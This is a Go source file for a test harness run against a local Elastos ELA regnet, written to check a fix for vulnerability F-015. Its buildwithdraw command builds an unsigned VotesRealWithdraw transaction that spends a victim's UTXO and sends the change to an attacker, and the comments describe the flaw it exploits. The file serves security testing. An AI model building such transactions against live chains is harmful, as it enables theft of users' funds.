package main

// onchainharness -- reusable on-chain test harness for the ELA rehearsal regnet.
//
// It is deliberately built as a NEW, self-contained command inside the (otherwise
// read-only) ela-v0997 tree so that every wire byte it produces is generated by the
// tree's OWN payload / serialization / account code -- the transactions it submits are
// therefore byte-for-byte what a real node would accept, never a hand-rolled guess.
//
// The harness is generic infrastructure meant to be reused for future fixes (F-212, ...):
//   * chain control ....... mineto, balance, coinbase, submit, listunspent, utxo
//   * funding ............. fund (build+sign+submit a standard transfer from the miner)
//   * exploit tx-builders . buildwithdraw (the F-015 malicious VotesRealWithdraw),
//                           buildexchangevotes / buildreturnvotes (seed a withdrawable
//                           entry so a real withdraw has something to consume)
//   * discovery ........... address (print the well-known stake-pool / miner addresses)
//
// The builders that carry a signature (fund / exchangevotes / returnvotes) sign with the
// miner keystore. buildwithdraw signs NOTHING: VotesRealWithdraw is exempt from RunPrograms
// (checkTransactionSignature short-circuits for it), which is the exact property F-015 is
// about -- its only authorization is input provenance.
//
// Configuration comes from the environment so the same binary works against any regnet:
//   HARNESS_RPC       (default http://127.0.0.1:22336)
//   HARNESS_RPCUSER   (default rehearsal)
//   HARNESS_RPCPASS   (default rehearsal)
//   HARNESS_KEYSTORE  (default /root/rehearsal/keystore.dat)
//   HARNESS_PASSWORD  (default rehearsal123)
//
// All amounts on the command line are in sela (1 ELA = 1e8 sela), matching Fixed64.

import (
	"bytes"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"io"
	"math"
	"math/rand"
	"net/http"
	"os"
	"strconv"
	"time"

	"github.com/elastos/Elastos.ELA/account"
	"github.com/elastos/Elastos.ELA/common"
	"github.com/elastos/Elastos.ELA/core/contract"
	pg "github.com/elastos/Elastos.ELA/core/contract/program"
	"github.com/elastos/Elastos.ELA/core/transaction"
	common2 "github.com/elastos/Elastos.ELA/core/types/common"
	"github.com/elastos/Elastos.ELA/core/types/functions"
	"github.com/elastos/Elastos.ELA/core/types/outputpayload"
	"github.com/elastos/Elastos.ELA/core/types/payload"

	_ "github.com/elastos/Elastos.ELA/core/types" // register init hooks
)

// ---------------------------------------------------------------------------
// Well-known regnet constants (mirrors common/config/config.go RegNet()).
// StakePool has no private key; VotesRealWithdraw spends it WITHOUT a signature.
// ---------------------------------------------------------------------------

const realWithdrawSingleFee = common.Fixed64(10000) // RegNet CRConfiguration.RealWithdrawSingleFee
const minTxFee = common.Fixed64(100)                // RegNet MinTransactionFee
const coinbaseMaturity = 100

// stakePoolProgramHash == config.StakePoolProgramHash ("STAKEPooLXXXXXXXXXXXXXXXXXXXpP1PQ2").
var stakePoolProgramHash = common.Uint168{
	0x3f, 0x40, 0x5c, 0x9e, 0x71, 0x3f, 0x20,
	0x13, 0xa3, 0x16, 0x39, 0x49, 0xbd, 0xd6,
	0xf0, 0xbc, 0xad, 0xd6, 0xc8, 0xf5, 0xab,
}

// ---------------------------------------------------------------------------
// Small helpers
// ---------------------------------------------------------------------------

func fatal(msg string, err error) {
	if err != nil {
		fmt.Fprintf(os.Stderr, "ERR %s: %v\n", msg, err)
		os.Exit(1)
	}
}

func check(cond bool, msg string) {
	if !cond {
		fmt.Fprintf(os.Stderr, "ERR %s\n", msg)
		os.Exit(1)
	}
}

func env(key, def string) string {
	if v := os.Getenv(key); v != "" {
		return v
	}
	return def
}

func parseSela(s string) common.Fixed64 {
	v, err := strconv.ParseInt(s, 10, 64)
	fatal("parse sela "+s, err)
	return common.Fixed64(v)
}

// byteBuf is a trivial io.Writer capturing serialized tx bytes.
type byteBuf struct{ b []byte }

func (w *byteBuf) Write(p []byte) (int, error) { w.b = append(w.b, p...); return len(p), nil }

func serializeHex(tx interface{ Serialize(io.Writer) error }) string {
	var buf byteBuf
	fatal("serialize", tx.Serialize(&buf))
	return hex.EncodeToString(buf.b)
}

// rpcTxIDToUint256 reverses an RPC display-order txid into an internal Uint256,
// exactly as node code stores it (RPC prints reversed bytes).
func rpcTxIDToUint256(displayHex string) common.Uint256 {
	raw, err := hex.DecodeString(displayHex)
	fatal("decode txid", err)
	h, err := common.Uint256FromBytes(common.BytesReverse(raw))
	fatal("txid->uint256", err)
	return *h
}

// internalHashToUint256 parses an internal-order hash (as printed by Uint256.String())
// straight into a Uint256 with NO reversal.
func internalHashToUint256(internalHex string) common.Uint256 {
	raw, err := hex.DecodeString(internalHex)
	fatal("decode hash", err)
	h, err := common.Uint256FromBytes(raw)
	fatal("hash->uint256", err)
	return *h
}

func addrToProgramHash(addr string) common.Uint168 {
	ph, err := common.Uint168FromAddress(addr)
	fatal("addr->programhash "+addr, err)
	return *ph
}

// ---------------------------------------------------------------------------
// JSON-RPC client
// ---------------------------------------------------------------------------

type rpcClient struct {
	url, user, pass string
	http            *http.Client
}

func newRPC() *rpcClient {
	return &rpcClient{
		url:  env("HARNESS_RPC", "http://127.0.0.1:22336"),
		user: env("HARNESS_RPCUSER", "rehearsal"),
		pass: env("HARNESS_RPCPASS", "rehearsal"),
		http: &http.Client{Timeout: 60 * time.Second},
	}
}

type rpcResp struct {
	Result json.RawMessage `json:"result"`
	Error  json.RawMessage `json:"error"`
}

// call issues a JSON-RPC POST and returns the raw result, or an error carrying the
// node's error payload (so exploit rejections surface their exact message string).
func (c *rpcClient) call(method string, params map[string]interface{}) (json.RawMessage, error) {
	payloadMap := map[string]interface{}{"method": method}
	if params != nil {
		payloadMap["params"] = params
	}
	body, _ := json.Marshal(payloadMap)
	req, err := http.NewRequest("POST", c.url, bytes.NewReader(body))
	if err != nil {
		return nil, err
	}
	req.Header.Set("Content-Type", "application/json")
	req.SetBasicAuth(c.user, c.pass)
	resp, err := c.http.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	raw, _ := io.ReadAll(resp.Body)
	var out rpcResp
	if err := json.Unmarshal(raw, &out); err != nil {
		return nil, fmt.Errorf("bad rpc response: %s", string(raw))
	}
	if len(out.Error) > 0 && string(out.Error) != "null" {
		return nil, fmt.Errorf("%s", string(out.Error))
	}
	return out.Result, nil
}

func (c *rpcClient) blockCount() uint32 {
	res, err := c.call("getblockcount", nil)
	fatal("getblockcount", err)
	var n uint32
	fatal("decode blockcount", json.Unmarshal(res, &n))
	return n
}

// discreteMine mines n blocks on demand and returns the new height.
func (c *rpcClient) discreteMine(n int) uint32 {
	_, err := c.call("discretemining", map[string]interface{}{"count": n})
	fatal("discretemining", err)
	return c.blockCount()
}

type utxo struct {
	TxID          string `json:"txid"`
	VOut          uint16 `json:"vout"`
	Address       string `json:"address"`
	Amount        string `json:"amount"` // decimal ELA string
	Confirmations int64  `json:"confirmations"`
	TxType        int    `json:"txtype"`
}

func (c *rpcClient) listUnspent(addr string) []utxo {
	res, err := c.call("listunspent", map[string]interface{}{"addresses": []string{addr}})
	fatal("listunspent", err)
	var out []utxo
	if string(res) == "null" || len(res) == 0 {
		return out
	}
	fatal("decode utxos", json.Unmarshal(res, &out))
	return out
}

func (c *rpcClient) receivedByAddress(addr string) string {
	res, err := c.call("getreceivedbyaddress", map[string]interface{}{"address": addr})
	fatal("getreceivedbyaddress", err)
	var s string
	fatal("decode balance", json.Unmarshal(res, &s))
	return s
}

func (c *rpcClient) submit(hexData string) (string, error) {
	res, err := c.call("sendrawtransaction", map[string]interface{}{"data": hexData})
	if err != nil {
		return "", err
	}
	var txid string
	fatal("decode txid", json.Unmarshal(res, &txid))
	return txid, nil
}

// utxoValue looks up the value of a specific outpoint in an address's UTXO set.
func (c *rpcClient) utxoValue(addr, txid string, vout uint16) (common.Fixed64, bool) {
	for _, u := range c.listUnspent(addr) {
		if u.TxID == txid && u.VOut == vout {
			v, e := common.StringToFixed64(u.Amount)
			fatal("utxo amount", e)
			return *v, true
		}
	}
	return 0, false
}

// ---------------------------------------------------------------------------
// Keystore / signing
// ---------------------------------------------------------------------------

func minerClient() *account.Client {
	ks := env("HARNESS_KEYSTORE", "/root/rehearsal/keystore.dat")
	pw := env("HARNESS_PASSWORD", "rehearsal123")
	client, err := account.Open(ks, []byte(pw))
	fatal("open keystore", err)
	return client
}

func openMiner() *account.Account {
	acc := minerClient().GetMainAccount()
	check(acc != nil, "nil main account")
	return acc
}

// stakeProgramHash derives the DPoSV2 stake address bound to the miner's code.
// ExchangeVotes credits vote rights to this hash; ReturnVotes debits from it.
func stakeProgramHash(code []byte) common.Uint168 {
	ct, err := contract.CreateStakeContractByCode(code)
	fatal("create stake contract", err)
	return *ct.ToProgramHash()
}

func elaOutput(ph common.Uint168, value common.Fixed64) *common2.Output {
	return &common2.Output{
		AssetID:     *account.SystemAssetID,
		Value:       value,
		OutputLock:  0,
		ProgramHash: ph,
		Type:        common2.OTNone,
		Payload:     &outputpayload.DefaultOutput{},
	}
}

func newInput(displayTxid string, vout uint16) *common2.Input {
	return &common2.Input{
		Previous: common2.OutPoint{TxID: rpcTxIDToUint256(displayTxid), Index: vout},
		Sequence: math.MaxUint32,
	}
}

// ---------------------------------------------------------------------------
// Subcommands
// ---------------------------------------------------------------------------

// cmdMineTo mines until the chain reaches at least the requested height.
func cmdMineTo(args []string) {
	check(len(args) == 1, "usage: mineto <height>")
	target, err := strconv.ParseUint(args[0], 10, 32)
	fatal("parse height", err)
	rpc := newRPC()
	h := rpc.blockCount()
	for h < uint32(target) {
		batch := int(uint32(target) - h)
		if batch > 50 {
			batch = 50 // mine in bounded batches to keep RPC responses small
		}
		h = rpc.discreteMine(batch)
	}
	fmt.Printf("height=%d\n", h)
}

// cmdBalance prints the confirmed balance (sum of received UTXOs) for an address.
func cmdBalance(args []string) {
	check(len(args) == 1, "usage: balance <address>")
	fmt.Printf("balance=%s\n", newRPC().receivedByAddress(args[0]))
}

// cmdSubmit broadcasts a raw tx hex and prints the txid, or the node's exact
// rejection string (the observable proof point for a blocked exploit tx).
func cmdSubmit(args []string) {
	check(len(args) == 1, "usage: submit <hex>")
	txid, err := newRPC().submit(args[0])
	if err != nil {
		fmt.Printf("REJECTED %v\n", err)
		os.Exit(3)
	}
	fmt.Printf("ACCEPTED txid=%s\n", txid)
}

// cmdCoinbase prints the coinbase (tx[0]) outputs of a block at a given height.
func cmdCoinbase(args []string) {
	check(len(args) == 1, "usage: coinbase <height>")
	h, err := strconv.ParseUint(args[0], 10, 32)
	fatal("parse height", err)
	rpc := newRPC()
	res, err := rpc.call("getblockbyheight", map[string]interface{}{"height": h})
	fatal("getblockbyheight", err)
	var blk struct {
		Height uint32 `json:"height"`
		Tx     []struct {
			TxID string `json:"txid"`
			Type int    `json:"type"`
			VOut []struct {
				Value   string `json:"value"`
				Address string `json:"address"`
				N       int    `json:"n"`
			} `json:"vout"`
		} `json:"tx"`
	}
	fatal("decode block", json.Unmarshal(res, &blk))
	check(len(blk.Tx) > 0, "block has no transactions")
	cb := blk.Tx[0]
	fmt.Printf("height=%d coinbase_txid=%s outputs=%d\n", blk.Height, cb.TxID, len(cb.VOut))
	for _, o := range cb.VOut {
		fmt.Printf("  vout[%d] value=%s address=%s\n", o.N, o.Value, o.Address)
	}
}

// cmdListUnspent dumps the UTXO set of an address (reuse helper for funding/selection).
func cmdListUnspent(args []string) {
	check(len(args) == 1, "usage: listunspent <address>")
	for _, u := range newRPC().listUnspent(args[0]) {
		fmt.Printf("txid=%s vout=%d amount=%s conf=%d txtype=%d\n",
			u.TxID, u.VOut, u.Amount, u.Confirmations, u.TxType)
	}
}

// cmdAddress prints the well-known addresses the harness works with.
func cmdAddress(args []string) {
	acc := openMiner()
	stake := stakeProgramHash(acc.RedeemScript)
	stakeAddr, _ := stake.ToAddress()
	poolAddr, _ := stakePoolProgramHash.ToAddress()
	fmt.Printf("miner_address=%s\n", acc.Address)
	fmt.Printf("miner_stake_address=%s\n", stakeAddr)
	fmt.Printf("stake_pool_address=%s\n", poolAddr)
}

// selectMinerUTXO picks the smallest mature miner UTXO that still covers `need`.
// Coinbase outputs must be `coinbaseMaturity` blocks deep before they can be spent.
func selectMinerUTXO(rpc *rpcClient, minerAddr string, need common.Fixed64) (utxo, common.Fixed64) {
	var best utxo
	var bestVal common.Fixed64 = -1
	for _, u := range rpc.listUnspent(minerAddr) {
		if u.Confirmations < coinbaseMaturity {
			continue
		}
		val, err := common.StringToFixed64(u.Amount)
		fatal("utxo amount", err)
		if *val >= need && (bestVal < 0 || *val < bestVal) {
			best, bestVal = u, *val
		}
	}
	check(bestVal >= 0, fmt.Sprintf("no mature miner UTXO covers %d sela", need))
	return best, bestVal
}

// cmdFund builds+signs+submits a standard transfer of `amount` sela from the miner
// to `dest`, mines one block to confirm, and prints the created victim outpoint
// (txid:0) that later becomes the exploit's non-stake-pool input.
func cmdFund(args []string) {
	check(len(args) == 2, "usage: fund <dest-address> <amount-sela>")
	dest := addrToProgramHash(args[0])
	amount := parseSela(args[1])
	rpc := newRPC()
	client := minerClient()
	acc := client.GetMainAccount()
	check(acc != nil, "nil miner account")

	in, inVal := selectMinerUTXO(rpc, acc.Address, amount+minTxFee)
	change := inVal - amount - minTxFee

	outputs := []*common2.Output{elaOutput(dest, amount)}
	if change > 0 {
		outputs = append(outputs, elaOutput(acc.ProgramHash, change))
	}
	attr := common2.NewAttribute(common2.Nonce, []byte(strconv.FormatInt(rand.Int63(), 10)))
	tx := functions.CreateTransaction(
		common2.TxVersion09, common2.TransferAsset, 0,
		&payload.TransferAsset{},
		[]*common2.Attribute{&attr},
		[]*common2.Input{newInput(in.TxID, in.VOut)},
		outputs,
		0,
		[]*pg.Program{{Code: acc.RedeemScript, Parameter: nil}},
	)
	signed, err := client.Sign(tx)
	fatal("sign transfer", err)
	txid, err := rpc.submit(serializeHex(signed))
	fatal("submit transfer", err)
	rpc.discreteMine(1)
	fmt.Printf("fund_txid=%s victim_outpoint=%s:0 value=%d change=%d\n", txid, txid, amount, change)
}

// cmdBuildExchangeVotes builds+signs an ExchangeVotes tx that stakes `stake` sela
// into the stake pool, crediting DposV2VoteRights for the miner's stake address.
// output[0] = OTStake -> stake pool ; output[1] = change back to miner.
func cmdBuildExchangeVotes(args []string) {
	check(len(args) == 3, "usage: buildexchangevotes <in-txid> <in-vout> <stake-sela>  (input=mature miner UTXO)")
	inTxid := args[0]
	inVout64, err := strconv.ParseUint(args[1], 10, 16)
	fatal("parse vout", err)
	stake := parseSela(args[2])

	rpc := newRPC()
	client := minerClient()
	acc := client.GetMainAccount()
	check(acc != nil, "nil miner account")

	inVal, ok := rpc.utxoValue(acc.Address, inTxid, uint16(inVout64))
	check(ok, "input UTXO not found in miner set")
	change := inVal - stake - minTxFee
	check(change >= 0, "input too small for stake+fee")

	stakeHash := stakeProgramHash(acc.RedeemScript)
	stakeOut := &common2.Output{
		AssetID:     *account.SystemAssetID,
		Value:       stake,
		OutputLock:  0,
		ProgramHash: stakePoolProgramHash,
		Type:        common2.OTStake,
		Payload:     &outputpayload.ExchangeVotesOutput{Version: 0, StakeAddress: stakeHash},
	}
	outputs := []*common2.Output{stakeOut}
	if change > 0 {
		outputs = append(outputs, elaOutput(acc.ProgramHash, change))
	}
	attr := common2.NewAttribute(common2.Nonce, []byte(strconv.FormatInt(rand.Int63(), 10)))
	tx := functions.CreateTransaction(
		common2.TxVersion09, common2.ExchangeVotes, 0,
		&payload.ExchangeVotes{},
		[]*common2.Attribute{&attr},
		[]*common2.Input{newInput(inTxid, uint16(inVout64))},
		outputs,
		0,
		[]*pg.Program{{Code: acc.RedeemScript, Parameter: nil}},
	)
	signed, err := client.Sign(tx)
	fatal("sign exchangevotes", err)
	stakeAddr, _ := stakeHash.ToAddress()
	fmt.Printf("stake_address=%s stake_sela=%d stakepool_output=vout0\n", stakeAddr, stake)
	fmt.Printf("EXCHANGEVOTES_HEX=%s\n", serializeHex(signed))
}

// cmdBuildReturnVotes builds+signs a ReturnVotes(V0) tx that makes `value` sela
// withdrawable to `toAddr`. When mined, the node seeds
//   VotesWithdrawableTxInfo[thisTx.Hash()] = {Recipient: toAddr, Amount: value}
// which a later VotesRealWithdraw consumes. Requires prior vote rights >= value.
func cmdBuildReturnVotes(args []string) {
	check(len(args) == 4, "usage: buildreturnvotes <to-address> <value-sela> <in-txid> <in-vout>  (input=mature miner UTXO for fee)")
	toAddr := addrToProgramHash(args[0])
	value := parseSela(args[1])
	inTxid := args[2]
	inVout64, err := strconv.ParseUint(args[3], 10, 16)
	fatal("parse vout", err)

	rpc := newRPC()
	client := minerClient()
	acc := client.GetMainAccount()
	check(acc != nil, "nil miner account")

	inVal, ok := rpc.utxoValue(acc.Address, inTxid, uint16(inVout64))
	check(ok && inVal > minTxFee, "input UTXO not found / too small for fee")

	// Build and sign the V0 payload signature over the unsigned payload bytes.
	pl := &payload.ReturnVotes{
		ToAddr: toAddr,
		Code:   acc.RedeemScript,
		Value:  value,
	}
	unsigned := new(bytes.Buffer)
	fatal("serialize unsigned payload", pl.SerializeUnsigned(unsigned, payload.ReturnVotesVersionV0))
	sig, err := acc.Sign(unsigned.Bytes())
	fatal("sign payload", err)
	pl.Signature = sig

	change := inVal - minTxFee
	outputs := []*common2.Output{elaOutput(acc.ProgramHash, change)} // fee-only tx, change to miner
	attr := common2.NewAttribute(common2.Nonce, []byte(strconv.FormatInt(rand.Int63(), 10)))
	tx := functions.CreateTransaction(
		common2.TxVersion09, common2.ReturnVotes, payload.ReturnVotesVersionV0,
		pl,
		[]*common2.Attribute{&attr},
		[]*common2.Input{newInput(inTxid, uint16(inVout64))},
		outputs,
		0,
		[]*pg.Program{{Code: acc.RedeemScript, Parameter: nil}},
	)
	signed, err := client.Sign(tx)
	fatal("sign returnvotes tx", err)

	// tx.Hash() is the seed key. Print it in INTERNAL order (feed straight to
	// buildwithdraw) and in RPC display order (what sendrawtransaction returns).
	h := signed.Hash()
	fmt.Printf("RETURNVOTES_TXHASH_INTERNAL=%s\n", h.String())
	fmt.Printf("RETURNVOTES_TXID_RPC=%s\n", common.BytesToHexString(common.BytesReverse(h.Bytes())))
	fmt.Printf("seeded_recipient=%s seeded_amount=%d\n", args[0], value)
	fmt.Printf("RETURNVOTES_HEX=%s\n", serializeHex(signed))
}

// cmdBuildWithdraw constructs the F-015 VotesRealWithdraw and prints its hex.
// It SIGNS NOTHING: this tx type is exempt from RunPrograms, so its only
// authorization is input provenance -- exactly the property F-015 restores by
// binding inputs (and the change output) to the stake pool.
//
// Given a seed {Recipient, Amount=A} at withdraw-hash H, an input UTXO
// (in-txid:in-vout) worth V, fee f (=RealWithdrawSingleFee):
//   output[0] = {recipient, A - f}   (must equal seed recipient & Amount-fee)
//   output[1] = {change-addr, V - A} (the theft when input is a VICTIM UTXO and
//                                     change-addr is the attacker; or honest when
//                                     input is a stake-pool UTXO and change-addr
//                                     is the stake pool)
// Fee identity: V - ((A-f)+(V-A)) = f. If V == A, the change output is omitted.
func cmdBuildWithdraw(args []string) {
	check(len(args) >= 6, "usage: buildwithdraw <in-txid> <in-vout> <in-value-sela> <withdraw-hash-internal> <recipient-addr> <amount-sela> [change-addr] [fee-sela]")
	inTxid := args[0]
	inVout64, err := strconv.ParseUint(args[1], 10, 16)
	fatal("parse vout", err)
	inVal := parseSela(args[2])
	withdrawHash := internalHashToUint256(args[3])
	recipient := addrToProgramHash(args[4])
	amount := parseSela(args[5]) // the seeded Amount A
	changeHash := recipient      // default: change to recipient (attacker)
	if len(args) >= 7 && args[6] != "" {
		changeHash = addrToProgramHash(args[6])
	}
	fee := realWithdrawSingleFee
	if len(args) >= 8 && args[7] != "" {
		fee = parseSela(args[7])
	}

	check(amount > fee, "amount must exceed fee")
	check(inVal >= amount, "input value must be >= amount")

	// output[0]: exact recipient + (Amount - fee), as the checker demands.
	outputs := []*common2.Output{elaOutput(recipient, amount-fee)}
	// output[1]: the change, i.e. the swept remainder of the input.
	if inVal > amount {
		outputs = append(outputs, elaOutput(changeHash, inVal-amount))
	}

	pl := &payload.VotesRealWithdrawPayload{
		VotesRealWithdraw: []payload.VotesRealWidhdraw{{
			ReturnVotesTXHash: withdrawHash,
			StakeAddress:      stakePoolProgramHash, // ignored by the checker; any value
			Value:             amount,
		}},
	}
	// No attributes, no programs -- CheckAttributeProgram requires both empty and
	// checkTransactionSignature short-circuits, so NO signature is produced.
	tx := functions.CreateTransaction(
		common2.TxVersion09, common2.VotesRealWithdraw, payload.VotesRealWithdrawPayloadVersion,
		pl,
		[]*common2.Attribute{},
		[]*common2.Input{newInput(inTxid, uint16(inVout64))},
		outputs,
		0,
		[]*pg.Program{},
	)
	fmt.Printf("outputs=%d out0=(%s,%d) ", len(outputs), args[4], amount-fee)
	if inVal > amount {
		fmt.Printf("out1_change_value=%d ", inVal-amount)
	}
	fmt.Printf("fee=%d\n", fee)
	fmt.Printf("WITHDRAW_HEX=%s\n", serializeHex(tx))
}

// ---------------------------------------------------------------------------
// main / dispatch
// ---------------------------------------------------------------------------

func initFunctions() {
	// The tx factory closures must be wired before any tx is (de)serialized.
	functions.GetTransactionByTxType = transaction.GetTransaction
	functions.GetTransactionByBytes = transaction.GetTransactionByBytes
	functions.CreateTransaction = transaction.CreateTransaction
	functions.GetTransactionParameters = transaction.GetTransactionparameters
}

func usage() {
	fmt.Fprintln(os.Stderr, `onchainharness <subcommand> [args]

chain:    mineto <height>
          balance <address>
          coinbase <height>
          submit <hex>
          listunspent <address>
          address
fund:     fund <dest-address> <amount-sela>
builders: buildexchangevotes <in-txid> <in-vout> <stake-sela>
          buildreturnvotes <to-address> <value-sela> <in-txid> <in-vout>
          buildwithdraw <in-txid> <in-vout> <in-value-sela> <withdraw-hash-internal> <recipient-addr> <amount-sela> [change-addr] [fee-sela]

env: HARNESS_RPC HARNESS_RPCUSER HARNESS_RPCPASS HARNESS_KEYSTORE HARNESS_PASSWORD`)
}

func main() {
	initFunctions()
	rand.Seed(time.Now().UnixNano())
	if len(os.Args) < 2 {
		usage()
		os.Exit(2)
	}
	args := os.Args[2:]
	switch os.Args[1] {
	case "mineto":
		cmdMineTo(args)
	case "balance":
		cmdBalance(args)
	case "coinbase":
		cmdCoinbase(args)
	case "submit":
		cmdSubmit(args)
	case "listunspent":
		cmdListUnspent(args)
	case "address":
		cmdAddress(args)
	case "fund":
		cmdFund(args)
	case "buildexchangevotes":
		cmdBuildExchangeVotes(args)
	case "buildreturnvotes":
		cmdBuildReturnVotes(args)
	case "buildwithdraw":
		cmdBuildWithdraw(args)
	default:
		fmt.Fprintf(os.Stderr, "unknown subcommand %q\n", os.Args[1])
		usage()
		os.Exit(2)
	}
}
